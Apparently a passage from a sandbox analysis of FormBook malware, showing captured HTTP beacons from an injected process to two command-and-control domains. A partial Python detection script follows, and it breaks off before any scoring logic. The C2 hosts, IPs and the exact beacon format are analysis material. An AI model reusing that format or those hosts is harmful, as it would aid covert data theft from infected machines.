                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.beythome.online
                                                                                  Referer: http://www.beythome.online/80gy/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 35 44 48 66 6d 71 4f 44 39 36 6a 70 32 2b 37 4f 64 34 52 53 6a 64 6d 43 74 7a 78 6f 45 32 63 31 41 47 46 42 66 6e 78 42 2b 48 5a 43 4e 58 58 4a 52 6f 38 49 6e 7a 71 52 62 53 74 4f 68 69 58 48 4d 35 6b 68 70 7a 2b 4e 78 4f 4f 71 42 45 67 31 50 51 49 34 6e 54 36 6a 4a 4f 59 62 59 74 64 6b 63 64 36 59 73 46 70 51 72 32 34 5a 6d 42 71 58 77 36 64 74 38 48 65 41 58 61 53 59 56 4a 49 72 68 56 37 6e 55 44 38 68 73 59 73 70 44 4b 38 4b 7a 30 71 35 79 79 74 79 74 54 6c 72 7a 47 36 46 30 33 4c 46 64 61 4d 2f 55 61 62 37 77 4c 41 71 78 41 51 6a 41 51 47 76 72 37 54 36 48 47 52 46
                                                                                  Data Ascii: GR54yHZ8=Xqn0ftDeUaM65DHfmqOD96jp2+7Od4RSjdmCtzxoE2c1AGFBfnxB+HZCNXXJRo8InzqRbStOhiXHM5khpz+NxOOqBEg1PQI4nT6jJOYbYtdkcd6YsFpQr24ZmBqXw6dt8HeAXaSYVJIrhV7nUD8hsYspDK8Kz0q5yytytTlrzG6F03LFdaM/Uab7wLAqxAQjAQGvr7T6HGRF


Session ID: 14 | Source: 192.168.2.6:50000 | Destination: 85.159.66.93:80 | PID: 3320 | Process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:48.138432026 CET | 843 | OUT | POST /80gy/ HTTP/1.1
                                                                                  Host: www.beythome.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.beythome.online
                                                                                  Referer: http://www.beythome.online/80gy/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 36 6a 58 66 71 73 47 44 36 61 6a 6d 71 75 37 4f 54 59 52 57 6a 64 71 43 74 79 31 34 45 45 49 31 48 6a 35 42 65 6a 6c 42 77 6e 5a 43 44 33 58 41 66 49 38 44 6e 7a 32 33 62 51 4a 4f 68 6d 2f 48 4d 34 55 68 6f 41 57 4f 77 65 4f 53 4a 6b 67 33 53 41 49 34 6e 54 36 6a 4a 4b 49 78 59 74 31 6b 63 73 4b 59 75 6b 70 54 6c 57 35 72 6e 42 71 58 30 36 64 32 38 48 65 79 58 59 72 7a 56 50 55 72 68 58 6a 6e 56 53 38 69 6c 59 73 72 4d 71 39 59 2b 78 33 6c 74 42 4d 33 75 68 4a 70 79 6e 4b 38 78 42 57 66 42 70 4d 63 47 4b 37 35 77 4a 59 59 78 67 51 4a 43 51 2b 76 35 73 66 64 49 79 30 6d 4b 52 35 4e 74 30 49 52 78 50 33 71 62 69 4e 71 5a 65 70 73 41 67 3d 3d
                                                                                  Data Ascii: GR54yHZ8=Xqn0ftDeUaM66jXfqsGD6ajmqu7OTYRWjdqCty14EEI1Hj5BejlBwnZCD3XAfI8Dnz23bQJOhm/HM4UhoAWOweOSJkg3SAI4nT6jJKIxYt1kcsKYukpTlW5rnBqX06d28HeyXYrzVPUrhXjnVS8ilYsrMq9Y+x3ltBM3uhJpynK8xBWfBpMcGK75wJYYxgQJCQ+v5sfdIy0mKR5Nt0IRxP3qbiNqZepsAg==


Session ID: 15 | Source: 192.168.2.6:50002 | Destination: 85.159.66.93:80 | PID: 3320 | Process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:50.683286905 CET | 1856 | OUT | POST /80gy/ HTTP/1.1
                                                                                  Host: www.beythome.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.beythome.online
                                                                                  Referer: http://www.beythome.online/80gy/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 36 6a 58 66 71 73 47 44 36 61 6a 6d 71 75 37 4f 54 59 52 57 6a 64 71 43 74 79 31 34 45 45 77 31 41 52 42 42 65 45 4a 42 78 6e 5a 43 64 6e 58 4e 66 49 38 53 6e 7a 2b 7a 62 51 31 34 68 6b 48 48 4f 61 73 68 76 78 57 4f 36 65 4f 53 57 55 67 79 50 51 49 68 6e 54 71 6e 4a 4f 55 78 59 74 31 6b 63 76 53 59 67 6c 70 54 6e 57 34 5a 6d 42 71 44 77 36 63 34 38 48 32 59 58 65 32 49 56 5a 6b 72 68 33 7a 6e 59 42 55 69 71 59 73 31 41 4b 38 64 2b 78 7a 4d 74 42 51 52 75 6b 63 4d 79 6b 57 38 31 55 76 54 54 34 34 32 46 4c 44 4a 6f 5a 38 65 33 6d 73 42 49 54 36 50 33 4e 44 50 4f 42 64 52 43 46 4e 50 67 30 56 48 38 64 4c 61 58 6c 73 6e 54 36 77 62 5a 4a 69 6c 4d 71 4c 64 55 2f 6f 47 4d 77 69 6f 51 66 59 4e 59 75 6d 6a 61 30 74 64 4a 6c 66 2b 6e 54 50 34 42 2f 67 73 6e 63 32 6d 58 41 69 44 7a 32 42 6b 39 58 55 7a 78 48 66 4b 37 43 5a 70 64 4d 58 2b 50 2f 2b 4e 4f 58 59 31 61 4f 59 71 39 35 61 31 4d 48 39 63 32 4f 32 36 59 74 47 53 42 71 43 79 6a 4d 6e 74 4c [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8= [TRUNCATED]


Session ID: 16 | Source: 192.168.2.6:50003 | Destination: 85.159.66.93:80 | PID: 3320 | Process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:53.221496105 CET | 557 | OUT | GET /80gy/?9xn=fHadNpk8MVax&GR54yHZ8=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sMbIBlgbQh0ui0+zZIwlVcUsfMWllXpvy1Ukuj6D4Ic/01nyaOg= HTTP/1.1
                                                                                  Host: www.beythome.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:32:53.922540903 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Wed, 20 Nov 2024 07:32:53 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-11-20T07:32:58.8059698Z


Session ID: 17 | Source: 192.168.2.6:50004 | Destination: 103.21.221.4:80 | PID: 3320 | Process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:59.045275927 CET | 840 | OUT | POST /0kli/ HTTP/1.1
                                                                                  Host: www.tempatmudisini06.click
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.tempatmudisini06.click
                                                                                  Referer: http://www.tempatmudisini06.click/0kli/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 49 50 64 41 32 43 56 4a 6a 55 6a 77 5a 47 73 65 4b 70 4f 74 6e 37 76 57 54 68 6a 2f 44 56 36 61 4a 63 4f 54 62 6b 49 6a 78 4e 6d 50 4d 30 51 4a 6c 74 7a 65 2f 67 59 31 49 56 56 33 66 6f 32 58 44 63 5a 43 50 5a 6d 76 64 74 74 5a 48 75 37 61 6c 6b 6d 72 33 41 4e 4a 61 38 63 53 39 6b 47 32 53 4d 6b 71 57 6e 32 34 2f 49 4b 56 38 5a 46 7a 59 61 30 52 71 51 58 79 57 74 77 58 4c 52 73 67 55 34 6b 47 52 68 6e 32 43 2f 44 72 56 6a 41 34 71 76 4a 34 56 43 48 68 2f 62 4f 47 2b 56 49 61 66 36 4c 70 47 59 69 64 57 66 51 50 43 33 76 65 35 6b 77 78 76 36 39 70 70 75 76 6d 37 7a 74 45
                                                                                  Data Ascii: GR54yHZ8=IcIMsTazYCJeIPdA2CVJjUjwZGseKpOtn7vWThj/DV6aJcOTbkIjxNmPM0QJltze/gY1IVV3fo2XDcZCPZmvdttZHu7alkmr3ANJa8cS9kG2SMkqWn24/IKV8ZFzYa0RqQXyWtwXLRsgU4kGRhn2C/DrVjA4qvJ4VCHh/bOG+VIaf6LpGYidWfQPC3ve5kwxv69ppuvm7ztE
Nov 20, 2024 08:32:59.965503931 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 20 Nov 2024 07:32:59 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID: 18 | Source: 192.168.2.6:50005 | Destination: 103.21.221.4:80 | PID: 3320 | Process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:33:01.591272116 CET | 864 | OUT | POST /0kli/ HTTP/1.1
                                                                                  Host: www.tempatmudisini06.click
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.tempatmudisini06.click
                                                                                  Referer: http://www.tempatmudisini06.click/0kli/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 4a 73 31 41 36 42 39 4a 71 55 69 43 63 47 73 65 54 35 4f 70 6e 37 6a 57 54 6a 50 76 43 6d 4f 61 4f 34 4b 54 59 67 38 6a 32 4e 6d 50 44 55 51 4d 72 4e 79 53 2f 67 55 48 49 58 52 33 66 6f 79 58 44 63 70 43 4f 71 65 73 66 39 74 48 66 65 37 55 34 30 6d 72 33 41 4e 4a 61 2f 68 4a 39 6c 75 32 53 63 30 71 57 46 4f 35 38 49 4b 55 72 70 46 7a 4a 4b 30 56 71 51 57 52 57 76 49 35 4c 54 6b 67 55 39 59 47 53 77 6e 35 4c 2f 44 74 62 44 42 34 69 39 67 72 61 7a 2b 58 33 49 33 72 70 79 55 65 61 4d 57 7a 61 72 69 2b 45 50 77 4e 43 31 33 73 35 45 77 62 74 36 46 70 37 35 6a 42 30 48 49 6e 38 4c 72 66 6d 66 45 55 72 63 6f 43 57 76 6a 47 7a 4c 42 4a 34 77 3d 3d
                                                                                  Data Ascii: GR54yHZ8=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCmOaO4KTYg8j2NmPDUQMrNyS/gUHIXR3foyXDcpCOqesf9tHfe7U40mr3ANJa/hJ9lu2Sc0qWFO58IKUrpFzJK0VqQWRWvI5LTkgU9YGSwn5L/DtbDB4i9graz+X3I3rpyUeaMWzari+EPwNC13s5Ewbt6Fp75jB0HIn8LrfmfEUrcoCWvjGzLBJ4w==
Nov 20, 2024 08:33:02.486272097 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 20 Nov 2024 07:33:02 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID: 19 | Source: 192.168.2.6:50006 | Destination: 103.21.221.4:80 | PID: 3320 | Process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:33:04.136784077 CET | 1877 | OUT | POST /0kli/ HTTP/1.1
                                                                                  Host: www.tempatmudisini06.click
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.tempatmudisini06.click
                                                                                  Referer: http://www.tempatmudisini06.click/0kli/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 4a 73 31 41 36 42 39 4a 71 55 69 43 63 47 73 65 54 35 4f 70 6e 37 6a 57 54 6a 50 76 43 6e 32 61 4a 4c 53 54 59 42 38 6a 33 4e 6d 50 4b 30 51 4e 72 4e 79 66 2f 68 39 4d 49 58 63 4d 66 72 61 58 4d 66 52 43 48 37 65 73 57 39 74 48 44 75 37 56 6c 6b 6d 45 33 45 70 46 61 2f 78 4a 39 6c 75 32 53 65 63 71 51 58 32 35 36 49 4b 56 38 5a 46 33 59 61 30 78 71 55 36 76 57 76 4d 48 4c 69 45 67 55 64 6f 47 43 53 50 35 54 76 44 76 57 6a 42 57 69 39 39 7a 61 79 54 35 33 4a 43 77 70 31 38 65 5a 4c 6e 34 50 71 50 6a 56 4f 42 76 64 43 7a 71 35 7a 63 34 72 62 35 75 71 49 6d 31 36 45 34 62 6b 63 6a 57 75 2b 41 56 73 4b 4e 73 51 59 4f 6b 6e 5a 45 56 72 76 5a 63 51 33 61 48 6d 43 46 48 77 4c 65 6b 4b 51 5a 71 71 5a 31 6a 77 57 65 6f 76 39 50 51 39 44 64 54 44 6a 46 69 44 4b 53 58 4c 50 4d 49 61 61 47 66 71 70 55 54 2f 41 6f 47 42 7a 6d 6e 6b 50 2f 48 65 55 56 33 6f 38 6b 41 30 56 6c 51 6c 66 68 39 34 30 43 6e 58 59 68 4e 72 75 31 67 52 67 65 76 52 2b 56 55 34 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCn2aJLSTYB8j3NmPK0QNrNyf/h9MIXcMfraXMfRCH7esW9tHDu7VlkmE3EpFa/xJ9lu2SecqQX256IKV8ZF3Ya0xqU6vWvMHLiEgUdoGCSP5TvDvWjBWi99zayT53JCwp18eZLn4PqPjVOBvdCzq5zc4rb5uqIm16E4bkcjWu+AVsKNsQYOknZEVrvZcQ3aHmCFHwLekKQZqqZ1jwWeov9PQ9DdTDjFiDKSXLPMIaaGfqpUT/AoGBzmnkP/HeUV3o8kA0VlQlfh940CnXYhNru1gRgevR+VU4CzA1/YCrFmeWA2RrbCVYqpHjNU8lwpM/SHDeCVeM97yiGrFUMn5Ax7A2TXvocGJnafe3ujQ4Ifyu77qHCnJ5GjCk5qL+SGHayxznxTftFdLf2ED1BQk5PYSqfoBq3IZkMBmi8q18K7OT1pPd+TC/ND0NHJeiZfWb2lsjWE4o5JjucQqdThVGDVqH6yzjr6AX+1ueeA8GwT8S+I1NjsTIcls4531/cKMxRcT0k3SG43PwTVNTZ9jEdIukUS10voAZoqaeIdYNhstN6anFxtmCRXPvYWGjOpPTGnIjuAnbFlFjoeMCK5qCqH+4JgOD5Krw6DYFjUXkGDJBqYmwAdl97SUazBt9Ly+09U7vDyJCLHp8ul8sgkbd3rw0DFopU3z/FOxfS6SCR7nCjQiLx+32phs/B4YPHSQqY2Cze47Dy6hfJOi5cIqAXaWGz4eH0Lykyb2eHoen+l/tPJ1AHfaJW/7KNPrtwMiUg2dJ9nRUiF9jJYo5NmK6ih2QfFCWID4eYFikKjII9UR0EXCt1ogmsChtU4isRaqq3jIt0AYiXX0jCWJ4iBhDdICgs1p8miHNSXxyHhAlgjf2lxmjC4GxEdKcuulAg0vhlMpWpx09CrkBlqM1OylHPdaZZYV6h/15RDbnuoOdzZI5acp61P5TDxFQZxJZfE7BA1 [TRUNCATED]
Nov 20, 2024 08:33:05.035121918 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 20 Nov 2024 07:33:04 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
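The sessions above show one injected process cycling through two C2 hosts (www.beythome.online, then www.tempatmudisini06.click) with the same request shape: a POST to a single short directory whose only form field, GR54yHZ8, carries raw Base64 with '+' and '/' left unescaped, a follow-up GET carrying that field plus 9xn, a Referer naming the very path being posted to although no GET preceded it in the capture, and a User-Agent claiming MSIE 7.0 while advertising Brotli and AVIF support that IE 7 never had. The script below is an added example; it is not part of the Joe Sandbox report and not FormBook code. It scores raw HTTP requests against those observable traits and correlates the field name across hosts. The request samples are constructed from the captured headers with bodies shortened to valid Base64 of the same shape, the benign login request is invented for contrast, and the indicator names, regular expressions and flag threshold are assumptions.

```python
"""Score raw HTTP requests for the beacon traits seen in sessions 13-20.
Added example; not from the Joe Sandbox report or FormBook. Samples are
constructed from the captured headers; indicator names, regexes and
FLAG_THRESHOLD are assumptions."""
import base64, binascii, re
from collections import defaultdict
from urllib.parse import urlsplit

CAPTURED_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; "
               ".NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; "
               "InfoPath.3; SLCC2; Media Center PC 6.0)")
CAPTURED_ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0 Safari/537.36"  # invented
SHORT_KEY = re.compile(r"^[A-Za-z0-9]{3,8}$")           # GR54yHZ8, 9xn
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]{12,}={0,2}$")
BEACON_PATH = re.compile(r"^/[a-z0-9]{3,6}/$")          # /80gy/, /0kli/
FLAG_THRESHOLD = 3  # independent traits needed before flagging (assumption)

def build_request(method, host, path, body="", ua=CAPTURED_UA, accept=CAPTURED_ACCEPT,
                  referer=None, encoding="gzip, deflate, br"):
    """Assemble a raw HTTP/1.1 request as test input (the captured GET legs omit Accept-Encoding)."""
    headers = [f"Host: {host}", f"Accept: {accept}", "Accept-Language: en-US,en;q=0.9"]
    headers += [f"Accept-Encoding: {encoding}"] if encoding else []
    headers += ["Connection: close", f"User-Agent: {ua}"]
    if body:
        headers += [f"Content-Length: {len(body)}",
                    "Content-Type: application/x-www-form-urlencoded", f"Origin: http://{host}"]
    if referer:
        headers.append(f"Referer: {referer}")
    return f"{method} {path} HTTP/1.1\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body

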